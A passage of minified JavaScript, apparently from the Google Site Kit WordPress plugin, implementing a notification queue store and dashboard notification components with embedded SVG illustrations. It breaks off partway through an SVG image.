d="INSERT_NOTIFICATION_INTO_RESOLVED_QUEUE",D="REGISTER_NOTIFICATION",y="RECEIVE_QUEUED_NOTIFICATIONS",z="DISMISS_NOTIFICATION",m="QUEUE_NOTIFICATION",T="RESET_QUEUE",p="MARK_NOTIFICATION_SEEN",S="PIN_NOTIFICATION",A="UNPIN_NOTIFICATION",x="POPULATE_QUEUE",E="PERSIST_SEEN_NOTIFICATIONS",h="PERSIST_PINNED_NOTIFICATIONS",k="googlesitekit_notification_seen",f="googlesitekit_notification_pinned",w=(l||(l=I("sessionStorage")?t.g.sessionStorage:I("localStorage")?t.g.localStorage:new NullStorage),l);const C={notifications:{},queuedNotifications:{},seenNotifications:JSON.parse(w.getItem(k)||"{}"),pinnedNotification:JSON.parse(w.getItem(f)||"{}")},L={insertNotificationIntoResolvedQueue:e=>({payload:{id:e},type:d}),registerNotification:(0,c.$C)((e,{Component:i,areaSlug:t,viewContexts:o})=>{r()(i,"Component is required to register a notification.");const n=Object.values(j.bI);r()(n.includes(t),`Notification area should be one of: ${n.join(", ")}, but "${t}" was provided.`),r()(void 0===o||Array.isArray(o)&&o.some(s.$.includes,s.$),`Notification view context should be one of: ${s.$.join(", ")}, but "${o}" was provided.`)},function*(e,{Component:i,priority:t=10,areaSlug:n,groupID:a=j.He.DEFAULT,viewContexts:r,checkRequirements:I,isDismissible:l,dismissRetries:c=0,featureFlag:g=""}){yield{payload:{id:e,settings:{Component:i,priority:t,areaSlug:n,groupID:a,viewContexts:r,checkRequirements:I,isDismissible:l,dismissRetries:c,featureFlag:g}},type:D};const u=yield o.commonActions.getRegistry();if(!r?.length){const{isNotificationDismissed:j}=u.select(s.D),d={id:e,Component:i,priority:t,areaSlug:n,groupID:a,viewContexts:r,checkRequirements:I,isDismissible:l,dismissRetries:c,featureFlag:g};yield o.commonActions.await(Promise.all([u.resolveSelect(M.oR).getDismissedItems(),u.resolveSelect(M.oR).getDismissedPrompts()]));const D=j(d.id);if(!N(d,{groupID:a,isDismissed:D}))return;return void(yield L.insertNotificationIntoResolvedQueue(e))}const{hasFinishedResolution:d}=u.select(s.D),{invalidateResolution:y}=u.dispatch(s.D);r.forEach(e=>{d("getQueuedNotifications",[e,a])&&y("getQueuedNotifications",[e,a])})}),receiveQueuedNotifications:(e,i=j.He.DEFAULT)=>({payload:{queuedNotifications:e,groupID:i},type:y}),resetQueue:(e=j.He.DEFAULT)=>({type:T,payload:{groupID:e}}),*populateQueue(e,i=j.He.DEFAULT){yield{type:x,payload:{viewContext:e,groupID:i}}},queueNotification:e=>({payload:{notification:e},type:m}),markNotificationSeen:(0,c.$C)(e=>{r()(function(e){return"string"==typeof e}(e),"a valid notification ID is required to mark a notification as seen.")},function*(e){const i=yield o.commonActions.getRegistry(),t=i.select(s.D).getNotification(e);if(t?.isDismissible){const t=i.select(M.oR).getReferenceDate();yield{payload:{dateSeen:t,notificationID:e},type:p},yield{type:E}}}),dismissNotification:(0,c.$C)((e,i={})=>{r()(e,"A notification id is required to dismiss a notification.");const{expiresInSeconds:t=0}=i;r()(Number.isInteger(t),"expiresInSeconds must be an integer.")},function*(e,i={}){const{expiresInSeconds:t=0}=i,n=yield o.commonActions.getRegistry();i.skipHidingFromQueue||(yield{type:z,payload:{id:e}});const a=n.select(s.D).getNotification(e);if(n.select(s.D).getPinnedNotificationID(a?.groupID)===e&&(yield L.unpinNotification(e,a.groupID)),!0!==a.isDismissible)return null;if(a.dismissRetries>0){const i=n.select(M.oR).getPromptDismissCount(e)<a.dismissRetries?t:0;return yield o.commonActions.await(n.dispatch(M.oR).dismissPrompt(e,{expiresInSeconds:i}))}return yield o.commonActions.await(n.dispatch(M.oR).dismissItem(e,{expiresInSeconds:t}))}),pinNotification:(0,c.$C)((e,i)=>{r()(e,"A notification id is required to pin a notification."),r()(i,"A groupID is required to pin a notification to a specific group.")},function*(e,i){yield{type:S,payload:{id:e,groupID:i}},yield{type:h}}),unpinNotification:(0,c.$C)((e,i)=>{r()(e,"A notification id is required to unpin a notification."),r()(i,"A groupID is required to unpin notification from a specific group.")},function*(e,i){yield{type:A,payload:{id:e,groupID:i}},yield{type:h}})},O={[x]:(0,o.createRegistryControl)(e=>async({payload:i})=>{const{viewContext:t,groupID:o}=i,n=e.select(s.D).getNotifications();await Promise.all([e.resolveSelect(M.oR).getDismissedItems(),e.resolveSelect(M.oR).getDismissedPrompts()]);const a=e.select(s.D).getSeenNotifications(),{isNotificationDismissed:r}=e.select(s.D);let I=Object.values(n).filter(e=>{const i=r(e.id);return N(e,{groupID:o,viewContext:t,isDismissed:i})}).map(({checkRequirements:i,...o})=>{const n=a[o.id]?.length||0;return{...o,viewCount:n,checkRequirements:i,check:async()=>!i||await i(e,t)}}).sort((e,i)=>e.viewCount-i.viewCount);const{queueNotification:l}=e.dispatch(s.D),c=e.select(s.D).getPinnedNotificationID(o);if(c){const e=I.find(e=>e.id===c);if(e){await e.check()&&(l(e),I=I.filter(i=>i.id!==e.id))}}let u;do{u=await(0,g.zl)(I),u&&(l(u),I=I.filter(e=>e!==u))}while(u)}),[E]:(0,o.createRegistryControl)(e=>()=>{const i=e.select(s.D).getSeenNotifications();w.setItem(k,JSON.stringify(i))}),[h]:(0,o.createRegistryControl)(e=>()=>{const i=e.select(s.D).getPinnedNotificationIDs();w.setItem(f,JSON.stringify(i))})},b=(0,o.createReducer)((e,{type:i,payload:o})=>{switch(i){case d:{const{id:i}=o,{notifications:n,pinnedNotification:s,queuedNotifications:a}=e,r=n?.[i];if(void 0===r){t.g.console.warn(`Could not add notification with ID "${i}" to queue. Notification "${i}" is not registered.`);break}const{groupID:I,priority:l}=r;if(void 0===a[I])break;if(a[I].some(e=>e.id===i)){if(s[I]===i){const e=a[I].findIndex(e=>e.id===i),[t]=a[I].splice(e,1);a[I].unshift(t)}break}if(s[I]===i){a[I].unshift(r);break}const M=a[I].findIndex(e=>e.priority>=l);a[I].splice(-1!==M?M:e.queuedNotifications[I].length,0,r);break}case D:{const{id:i,settings:n}=o;void 0!==e.notifications[i]?t.g.console.warn(`Could not register notification with ID "${i}". Notification "${i}" is already registered.`):e.notifications[i]={...n,id:i};break}case y:e.queuedNotifications[o.groupID]=o.queuedNotifications;break;case T:e.queuedNotifications[o.groupID]=[];break;case m:{const{groupID:i,id:t}=o.notification;if(e.queuedNotifications[i]=e.queuedNotifications[i]||[],e.queuedNotifications[i].some(e=>e.id===t))break;e.queuedNotifications[i].push(o.notification);break}case p:{const{dateSeen:i,notificationID:t}=o,n={...e.seenNotifications};n[t]||(n[t]=[]),n[t].includes(i)||n[t].push(i),e.seenNotifications=n;break}case z:{const{id:i}=o,t=e.notifications?.[i]?.groupID,n=e.queuedNotifications[t]?.findIndex(e=>e.id===i);n>=0&&e.queuedNotifications[t].splice(n,1);break}case S:{const{id:i,groupID:t}=o;e.pinnedNotification[t]=i;break}case A:{const{id:i,groupID:t}=o;e.pinnedNotification[t]===i&&delete e.pinnedNotification[t];break}}}),Z={*getQueuedNotifications(e,i=j.He.DEFAULT){yield L.resetQueue(i),yield L.populateQueue(e,i)}},v={getSeenNotifications:e=>e.seenNotifications,getNotificationSeenDates(e,i){var t;const{seenNotifications:o}=e;return null!==(t=o[i])&&void 0!==t?t:[]},getNotifications:e=>e.notifications,getNotification:(e,i)=>e.notifications[i],getQueuedNotifications:(e,i,t=j.He.DEFAULT)=>(r()(i,"viewContext is required."),e.queuedNotifications[t]),isNotificationDismissed:(0,o.createRegistrySelector)(e=>(i,t)=>{const o=e(s.D).getNotification(t);if(void 0!==o)return o.dismissRetries>0?e(M.oR).isPromptDismissed(t):e(M.oR).isItemDismissed(t)}),isNotificationDismissalFinal:(0,o.createRegistrySelector)(e=>(i,t)=>{const o=e(s.D).getNotification(t);if(void 0===o)return;if(r()(o.isDismissible,"Notification should be dismissible to check if a notification is on its final dismissal."),0===o.dismissRetries)return!0;return e(M.oR).getPromptDismissCount(t)>=o.dismissRetries}),getPinnedNotificationIDs:e=>e.pinnedNotification,getPinnedNotificationID:(e,i)=>(r()(i,"groupID is required."),e.pinnedNotification[i])},R={initialState:C,actions:L,controls:O,reducer:b,resolvers:Z,selectors:v},U=(0,o.combineStores)(o.commonStore,R);var P=t(82286),G=t(20697),Q=t(11999),Y=t(29785),B=t(88273),H=t(80),W=t(22942),_=t(32981),V=t(49481),J=t(32803),F=t(58718),X=t(69782),K=t(82871),$=t(67510),q=t(62540);var ee=t(15844),ie=t(63696),te=t(49993),oe=t(70301),ne=t(17243),se=t(6109),ae=t(39119);const re="multiple",Ie="single",le="generic";function Me(e,i,t){let o,n;e.some(e=>!e.match(new RegExp("^https://www\\.googleapis\\.com/auth/")))?o=le:(n=function(e,i){if(void 0===i)return null;const t={siteverification:"site-verification",webmasters:J.Y,analytics:W.L1,subscribewithgoogle:ae.K$};return e.map(e=>e.match(new RegExp("^https://www\\.googleapis\\.com/auth/([a-z]+)"))).map(([,e])=>t[e]||e).map(e=>i[e]?.name||!1)}(e,i),!n||n.some(e=>!1===e)?o=le:(n=(0,ne.uniq)(n),o=1<n.length?re:Ie));const s=(0,K.__)("Site Kit can’t access necessary data","google-site-kit"),a=t?.data?(0,K.__)("Grant permission","google-site-kit"):(0,K.__)("Redo setup","google-site-kit");let r;switch(o){case re:r=(0,K.sprintf)(/* translators: %s: List of product names */ /* translators: %s: List of product names */ (0,K.__)("Site Kit can’t access all relevant data because you haven’t granted all permissions requested during setup. To use Site Kit, you’ll need to redo the setup for: %s – make sure to approve all permissions at the authentication stage.","google-site-kit"),(0,se.K5)(n));break;case Ie:r=(0,K.sprintf)(/* translators: %s: Product name */ /* translators: %s: Product name */ (0,K.__)("Site Kit can’t access the relevant data from %1$s because you haven’t granted all permissions requested during setup. To use Site Kit, you’ll need to redo the setup for %1$s – make sure to approve all permissions at the authentication stage.","google-site-kit"),n[0]);break;case le:r=(0,K.__)("Site Kit can’t access all relevant data because you haven’t granted all permissions requested during setup. To use Site Kit, you’ll need to redo the setup – make sure to approve all permissions at the authentication stage.","google-site-kit")}return{title:s,message:r,ctaLabel:a}}var ce=t(76984),ge=t(68832);var ue=t(62688),Ne=t.n(ue),je=t(4124);function GatheringDataNotification({id:e,Notification:i}){const[t,n]=(0,ie.useState)(!1),s=(0,o.useSelect)(e=>e(Y.O4).getConnectMoreServicesURL()),{analyticsGatheringData:a,searchConsoleGatheringData:r}=function(){const e=(0,je.A)(),i=(0,o.useSelect)(e=>e(B.i).isModuleConnected(W.L1)),t=(0,o.useSelect)(i=>!e||i(M.oR).canViewSharedModule(W.L1)),n=(0,o.useSelect)(i=>!e||i(M.oR).canViewSharedModule(J.Y)),s=(0,o.useSelect)(i=>{if(!e)return!1;const t=i(B.i).getRecoverableModules();return void 0!==t?Object.keys(t).includes(W.L1):void 0}),a=(0,o.useSelect)(i=>{if(!e)return!1;const t=i(B.i).getRecoverableModules();return void 0!==t?Object.keys(t).includes(J.Y):void 0});return{analyticsGatheringData:(0,o.useInViewSelect)(e=>!(!i||!t||!1!==s)&&e(H.K9).isGatheringData(),[i,t,s]),searchConsoleGatheringData:(0,o.useInViewSelect)(e=>n&&!1===a&&e(V.n).isGatheringData(),[n,a]),analyticsHasZeroData:(0,o.useInViewSelect)(e=>!(!i||!t||!1!==s)&&e(H.K9).hasZeroData(),[i,t,s]),searchConsoleHasZeroData:(0,o.useInViewSelect)(e=>n&&!1===a&&e(V.n).hasZeroData(),[n,a])}}();let I,l=72;return a&&r?I=(0,K.__)("Search Console and Analytics are gathering data","google-site-kit"):a?I=(0,K.__)("Analytics is gathering data","google-site-kit"):r&&(l=48,I=(0,K.__)("Search Console is gathering data","google-site-kit")),l?(0,q.jsx)(i,{children:(0,q.jsx)($.A,{notificationID:e,type:$.Q.INFO,title:I,description:(0,K.sprintf)(/* translators: %s: the number of hours the site can be in a gathering data state */ /* translators: %s: the number of hours the site can be in a gathering data state */ (0,K._n)("It can take up to %s hour before stats show up for your site. While you’re waiting, connect more services to get more stats.","It can take up to %s hours before stats show up for your site. While you’re waiting, connect more services to get more stats.",l,"google-site-kit"),l),ctaButton:{label:(0,K.__)("Connect more services","google-site-kit"),href:s,dismissOnClick:!0,dismissOptions:{expiresInSeconds:se.tt,skipHidingFromQueue:!0},onClick:()=>n(!0),inProgress:t},dismissButton:{label:(0,K.__)("Got it","google-site-kit"),dismissOptions:{expiresInSeconds:se.tt},disabled:t},svg:{desktop:"data:image/svg+xml;base64,<svg width="360" height="182" viewBox="0 0 360 182" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M281.078 116.275C275.149 144.826 247.682 170.346 216.686 162.334C185.69 154.322 185.21 126.334 166.71 118.334C148.21 110.334 138.757 125.757 116.598 119.865C94.4392 113.974 76.9979 94.6167 77 64.7252C77.0021 34.8336 105.708 8.8341 131.208 11.3341C156.708 13.8341 165.709 31.3331 185.209 35.8336C204.709 40.3341 215.208 29.3339 236.207 32.3341C285.965 39.4431 287.007 87.7242 281.078 116.275Z" fill="#D0FBE1"/>
<g filter="url(#filter0_d_2705_17743)">
<rect x="105.71" y="33.8809" width="128" height="120.889" rx="6.98252" fill="#EBEEF0"/>
<mask id="mask0_2705_17743" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="105" y="33" width="129" height="121">
<rect x="105.71" y="33.8809" width="128" height="120" rx="6.98252" fill="#DEE3E6"/>
</mask>
<g mask="url(#mask0_2705_17743)">
<rect x="113.71" y="74.7703" width="52.2667" height="70.9333" rx="3.75128" fill="white"/>
<rect x="120.201" y="103.976" width="18.0797" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="120.201" y="98.876" width="6.49014" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="120.201" y="115.592" width="6.49014" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="120.201" y="131.62" width="6.49014" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<path d="M149.406 103.28C149.406 101.616 150.755 100.267 152.419 100.267H157.055C158.719 100.267 160.068 101.616 160.068 103.28C160.068 104.944 158.719 106.293 157.055 106.293H152.419C150.755 106.293 149.406 104.944 149.406 103.28Z" fill="#EBEEF0"/>
<rect x="120.189" y="81.9316" width="12.2769" height="3.06923" rx="1.53462" fill="#EBEEF0"/>
<path d="M149.406 119.996C149.406 118.332 150.755 116.982 152.419 116.982H157.055C158.719 116.982 160.068 118.332 160.068 119.996C160.068 121.66 158.719 123.009 157.055 123.009H152.419C150.755 123.009 149.406 121.66 149.406 119.996Z" fill="#EBEEF0"/>
<path d="M149.406 136.024C149.406 134.36 150.755 133.011 152.419 133.011H157.055C158.719 133.011 160.068 134.36 160.068 136.024C160.068 137.688 158.719 139.038 157.055 139.038H152.419C150.755 139.038 149.406 137.688 149.406 136.024Z" fill="#EBEEF0"/>
<rect x="119.738" y="120.691" width="19.0068" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="119.738" y="140.129" width="19.0068" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<path d="M165.887 91.3096H114.051" stroke="#EBEEF0" stroke-width="0.682051"/>
<rect x="172.377" y="74.77" width="52.2667" height="70.9333" rx="3.75128" fill="white"/>
<rect x="179.183" y="103.976" width="18.0389" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="179.183" y="98.876" width="6.47552" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="179.183" y="115.592" width="6.47552" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="179.183" y="131.62" width="6.47552" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<path d="M208.323 103.28C208.323 101.616 209.672 100.267 211.337 100.267H215.948C217.612 100.267 218.962 101.616 218.962 103.28C218.962 104.944 217.612 106.293 215.948 106.293H211.337C209.672 106.293 208.323 104.944 208.323 103.28Z" fill="#EBEEF0"/>
<rect x="179.198" y="81.9314" width="12.298" height="3.06923" rx="1.53462" fill="#EBEEF0"/>
<path d="M224.644 91.3096H172.378" stroke="#EBEEF0" stroke-width="0.682051"/>
<path d="M208.323 119.995C208.323 118.331 209.672 116.982 211.337 116.982H215.948C217.612 116.982 218.962 118.331 218.962 119.995C218.962 121.66 217.612 123.009 215.948 123.009H211.337C209.672 123.009 208.323 121.66 208.323 119.995Z" fill="#EBEEF0"/>
<path d="M208.323 136.024C208.323 134.36 209.672 133.011 211.337 133.011H215.948C217.612 133.011 218.962 134.36 218.962 136.024C218.962 137.688 217.612 139.037 215.948 139.037H211.337C209.672 139.037 208.323 137.688 208.323 136.024Z" fill="#EBEEF0"/>
<rect x="178.721" y="120.691" width="18.964" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect x="178.721" y="140.129" width="18.964" height="3.24507" rx="1.62254" fill="#EBEEF0"/>
<rect width="34.6667" height="17.6" rx="2.31569" transform="matrix(1 0 0 -1 189.975 69.4365)" fill="white"/>
<rect width="10.525" height="4.21034" rx="2.10517" transform="matrix(1 0 0 -1 193.278 64.9939)" fill="#EBEEF0"/>
<rect width="27.9965" height="1.68414" rx="0.842068" transform="matrix(1 0 0 -1 193.278 57.6257)" fill="#EBEEF0"/>
<rect width="34.7324" height="18.9465" rx="2.31569" transform="matrix(1 0 0 -1 151.808 70.874)" fill="white"/>
<rect width="22.1025" height="1.68414" rx="0.842068" transform="matrix(1 0 0 -1 155.176 67.5061)" fill="#EBEEF0"/>
<rect width="10.525" height="4.21034" rx="2.10517" transform="matrix(1 0 0 -1 155.176 63.927)" fill="#EBEEF0"/>
<rect width="27.9965" height="1.68414" rx="0.842068" transform="matrix(1 0 0 -1 155.176 56.5588)" fill="#EBEEF0"/>
<rect width="34.6667" height="17.6" rx="2.31569" transform="matrix(1 0 0 -1 113.71 69.437)" fill="white"/>
<path d="M117.078 62.8892C117.078 64.0519 118.02 64.9944 119.183 64.9944H125.498C126.66 64.9944 127.603 64.0519 127.603 62.8892C127.603 61.7266 126.66 60.784 125.498 60.784H119.183C118.02 60.784 117.078 61.7266 117.078 62.8892Z" fill="#EBEEF0"/>
<rect width="27.9965" height="1.68414" rx="0.842068" transform="matrix(1 0 0 -1 117.078 57.6262)" fill="#EBEEF0"/>
</g>
<path d="M105.71 40.7186C105.71 36.8623 108.836 33.7361 112.692 33.7361H226.569C230.425 33.7361 233.551 36.8623 233.551 40.7186V44.3161H105.71V40.7186Z" fill="white"/>
<rect x="111" y="37.2627" width="3.52667" height="3.52667" rx="1.76333" fill="#F3F5F7"/>
<rect x="116.29" y="37.2627" width="3.52667" height="3.52667" rx="1.76333" fill="#F3F5F7"/>
<rect x="121.623" y="37.2627" width="3.52667" height="3.52667" rx="1.76333" fill="#F3F5F7"/>
</g>
<circle cx="169.175" cy="94.4133" r="21.8661" fill="#EBEEF0"/>
<path d="M168.878 83.5371C174.865 83.5371 179.718 88.3901 179.718 94.3766C179.718 100.363 174.865 105.216 168.878 105.216C162.892 105.216 158.039 100.363 158.039 94.3766C158.039 93.2299 158.217 92.1247 158.547 91.0873" stroke="#93C9A8" stroke-width="3.12374" stroke-linecap="round"/>
<path d="M154.519 91.7681L159.035 89.2424L162.036 93.548" stroke="#93C9A8" stroke-width="3.12374" stroke-linecap="round" stroke-linejoin="round"/>
<defs>
<filter id="filter0_d_2705_17743" x="97.1764" y="27.3361" width="145.067" height="138.1" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="2.13333"/>
<feGaussianBlur stdDeviation="4.26667"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_2705_17743"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_2705_17743" result="shape"/>
</filter>
</defs>
</svg>
",mobile:void 0,verticalPosition:"center"}})}):null}GatheringDataNotification.propTypes={id:Ne().string,Notification:Ne().elementType};var de=t(32600);function GA4AdSenseLinkedNotification({id:e,Notification:i}){return(0,q.jsx)(i,{children:(0,q.jsx)(de.A,{notificationID:e,type:ce.Q.SUCCESS,title:(0,K.__)("Your AdSense and Analytics accounts are linked","google-site-kit"),description:(0,K.__)("We’ll let you know as soon as there’s enough data available","google-site-kit"),dismissButton:!0})})}GA4AdSenseLinkedNotification.propTypes={id:Ne().string.isRequired,Notification:Ne().elementType.isRequired};var De=t(62659),ye=t(78990);var ze=t(13606),me=t(38432),Te=t(25797);var pe=t(17443),Se=t(72050);function GoogleTagGatewaySetupSuccessSubtleNotification({id:e,Notification:i}){return(0,q.jsx)(i,{children:(0,q.jsx)(de.A,{notificationID:e,type:ce.Q.SUCCESS,title:(0,K.__)("You successfully enabled Google tag gateway for advertisers!","google-site-kit"),description:(0,K.__)("You can always disable it in Analytics or Ads settings","google-site-kit"),dismissButton:!0})})}function GoogleTagGatewaySetupBanner({id:e,Notification:i}){const[t,n]=(0,ie.useState)(!1),{setGoogleTagGatewayEnabled:a,saveGoogleTagGatewaySettings:r}=(0,o.useDispatch)(Y.O4),I={tooltipSlug:e,content:(0,K.__)("You can always enable Google tag gateway for advertisers in Settings later","google-site-kit"),dismissLabel:(0,K.__)("Got it","google-site-kit")},l=(0,pe.i)(I),{dismissNotification:c,registerNotification:g}=(0,o.useDispatch)(s.D),u=(0,o.useSelect)(e=>e(Y.O4).getDocumentationLinkURL("google-tag-gateway-introduction"));const N=(0,o.useSelect)(e=>{const i=e(Y.O4).getGoogleTagGatewaySettings();return e(Y.O4).getErrorForAction("saveGoogleTagGatewaySettings",[i])}),{triggerSurvey:d}=(0,o.useDispatch)(M.oR),D=(0,ie.useCallback)(()=>{d("view_gtg_setup_cta",{ttl:se.tt})},[d]);return(0,q.jsx)(i,{onView:D,children:(0,q.jsx)(Se.A,{notificationID:e,title:(0,K.__)("Get more comprehensive stats by collecting metrics via your own site","google-site-kit"),description:(0,ze.A)((0,K.__)("Enable Google tag gateway for advertisers (<em>beta</em>) to send measurement through your own domain - this helps improve the quality and completeness of Analytics or Ads metrics.","google-site-kit"),{em:(0,q.jsx)("em",{})}),learnMoreLink:{href:u},ctaButton:{label:(0,K.__)("Enable Google tag gateway for advertisers","google-site-kit"),onClick:async function(){n(!0),a(!0);const{error:i}=await r();i||(c(e),g("setup-success-notification-gtg",{Component:GoogleTagGatewaySetupSuccessSubtleNotification,areaSlug:j.bI.DASHBOARD_TOP,isDismissible:!1,featureFlag:"googleTagGateway"})),n(!1)},inProgress:t},dismissButton:{label:(0,K.__)("Maybe later","google-site-kit"),onClick:l},svg:{desktop:"data:image/svg+xml;base64,<svg width="485" height="258" viewBox="0 0 485 258" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1461_11383)">
<path d="M433.345 308.505C402.872 339.914 362.777 344.929 321.051 339.708C249.779 330.793 252.258 265.5 202.72 231C171.609 209.333 119.742 255.804 65.7203 235.5C5.29147 212.788 -32.7796 130.003 39.2203 67.5C93.7035 20.2034 131.05 51.9794 172.72 49C214.391 46.0206 229.483 35.7439 248.258 18.6292C270.162 -1.33884 308.72 -3.9118 337.472 4.57538C366.81 13.2355 387.691 33.8558 395.674 63.4971C401.751 86.07 399.101 128.832 415.258 150.129C437.258 179.129 452.708 187.742 459.777 221.629C465.917 251.06 451.595 289.65 433.345 308.505Z" fill="#B8E6CA"/>
<g filter="url(#filter0_d_1461_11383)">
<path d="M117.22 45.7639C117.22 38.1623 123.383 32 130.984 32H298.456C306.058 32 312.22 38.1623 312.22 45.7639V262.236C312.22 269.838 306.058 276 298.456 276H130.984C123.383 276 117.22 269.838 117.22 262.236V45.7639Z" fill="white"/>
</g>
<path d="M47.9118 87.6811C64.7299 87.6811 78.2845 73.6765 78.2845 56.5C78.2845 39.3235 64.7299 25.3189 47.9118 25.3189C31.0937 25.3189 17.5392 39.3235 17.5392 56.5C17.5392 73.6765 31.0937 87.6811 47.9118 87.6811Z" fill="#895A00" stroke="white" stroke-width="3.36212"/>
<mask id="mask0_1461_11383" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="19" y="27" width="58" height="59">
<ellipse cx="47.9118" cy="56.5" rx="28.6916" ry="29.5" fill="#D9D9D9"/>
</mask>
<g mask="url(#mask0_1461_11383)">
<path d="M59.9505 50.809C59.9505 57.1749 54.7899 62.3356 48.424 62.3356C42.0581 62.3356 36.8975 57.1749 36.8975 50.809C36.8975 44.4431 42.0581 39.2825 48.424 39.2825C54.7899 39.2825 59.9505 44.4431 59.9505 50.809Z" fill="#FECE72"/>
<ellipse cx="48.4241" cy="84.8677" rx="24.4939" ry="20.1472" fill="#FECE72"/>
</g>
<path d="M402.307 162.667C425.906 162.667 444.926 143.015 444.926 118.913C444.926 94.8104 425.906 75.1589 402.307 75.1589C378.708 75.1589 359.687 94.8104 359.687 118.913C359.687 143.015 378.708 162.667 402.307 162.667Z" fill="#895A00" stroke="white" stroke-width="4.71779"/>
<mask id="mask1_1461_11383" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="362" y="77" width="81" height="84">
<ellipse cx="402.481" cy="118.913" rx="40.2606" ry="41.3949" fill="#D9D9D9"/>
</mask>
<g mask="url(#mask1_1461_11383)">
<path fill-rule="evenodd" clip-rule="evenodd" d="M387.142 113.637C385.914 114.822 385.22 116.456 385.22 118.163V158.556C385.22 162.031 388.037 164.847 391.511 164.847H413.527C417.001 164.847 419.817 162.031 419.817 158.556V118.163C419.817 116.456 419.123 114.822 417.895 113.637L404.703 100.906C403.484 99.7296 401.553 99.7296 400.335 100.906L387.142 113.637ZM402.519 128.677C405.124 128.677 407.237 126.565 407.237 123.959C407.237 121.354 405.124 119.242 402.519 119.242C399.913 119.242 397.801 121.354 397.801 123.959C397.801 126.565 399.913 128.677 402.519 128.677Z" fill="#FECE72"/>
</g>
<path d="M132.583 63.061C132.583 60.8519 134.374 59.061 136.583 59.061H293.583C295.792 59.061 297.583 60.8519 297.583 63.061V101.061C297.583 103.27 295.792 105.061 293.583 105.061H136.583C134.374 105.061 132.583 103.27 132.583 101.061V63.061Z" fill="#FFE4B1"/>
<rect x="132.22" y="115" width="165" height="8" rx="4" fill="#FFE4B1"/>
<rect x="224.22" y="209" width="73" height="8" rx="4" fill="#FFE4B1"/>
<rect opacity="0.6" x="224.22" y="225" width="73" height="8" rx="4" fill="#FFE4B1"/>
<rect opacity="0.25" x="224.22" y="241" width="73" height="8" rx="4" fill="#FFE4B1"/>
<rect opacity="0.6" x="132.22" y="130" width="165" height="8" rx="4" fill="#FFE4B1"/>
<rect opacity="0.25" x="132.22" y="145" width="75" height="8" rx="4" fill="#FFE4B1"/>
<rect opacity="0.25" x="132.22" y="158" width="75" height="8" rx="4" fill="#FFE4B1"/>
<rect x="224.22" y="146" width="73" height="50" rx="4" fill="#FFE4B1"/>
<circle cx="240.22" cy="167" r="5" fill="#E1B155"/>
<path d="M251.59 173.768L242.22 185H281.22L267.038 168L256.909 180.143L251.59 173.768Z" fill="#E1B155"/>
<rect x="132.22" y="177" width="73" height="99" rx="4" fill="#FFE4B1"/>
<path d="M321.129 241.145C336.136 241.145 348.23 228.649 348.23 213.323C348.23 197.996 336.136 185.5 321.129 185.5C306.122 185.5 294.028 197.996 294.028 213.323C294.028 228.649 306.122 241.145 321.129 241.145Z" fill="#895A00" stroke="white" stroke-width="3"/>
<mask id="mask2_1461_11383" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="295" y="187" width="52" height="53">
<path d="M346.23 213.323C346.23 227.597 334.979 239.145 321.129 239.145C307.279 239.145 296.028 227.597 296.028 213.323C296.028 199.048 307.279 187.5 321.129 187.5C334.979 187.5 346.23 199.048 346.23 213.323Z" fill="#D9D9D9" stroke="black"/>
</mask>
<g mask="url(#mask2_1461_11383)">
<path d="M302.885 223.808L316.22 240H330.22C335.02 240 336.22 236 336.22 234V220C336.22 219.097 335.371 217.64 334.033 217C333.195 216.599 332.164 216.939 331.03 216.632C330.208 216.41 330.22 215.87 328.72 215.577C327.501 215.338 326.623 215.708 325.72 215.577C324.771 215.439 324.811 214.667 323.22 214.5C321.413 214.311 321.027 215.05 320.22 215V204C320.22 203 319.62 201 317.22 201C314.82 201 314.22 203 314.22 204V225.5C312.22 224.5 307.02 221 306.22 221C305.582 221 304.263 221.637 303.079 222.403C302.601 222.712 302.523 223.368 302.885 223.808Z" fill="#FECE72"/>
</g>
</g>
<defs>
<filter id="filter0_d_1461_11383" x="101.22" y="20" width="227" height="276" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>
<feOffset dy="4"/>
<feGaussianBlur stdDeviation="8"/>
<feComposite in2="hardAlpha" operator="out"/>
<feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.15 0"/>
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow_1461_11383"/>
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow_1461_11383" result="shape"/>
</filter>
<clipPath id="clip0_1461_11383">
<rect width="485" height="258" fill="white"/>
</clipPath>
</defs>
</svg>
",mobile:"data:image/svg+xml;base64,<svg width="461" height="146" viewBox="0 0 461 146" fill="none" xmlns="http://www.w3.org/2000/svg">
<g clip-path="url(#clip0_1505_4754)">
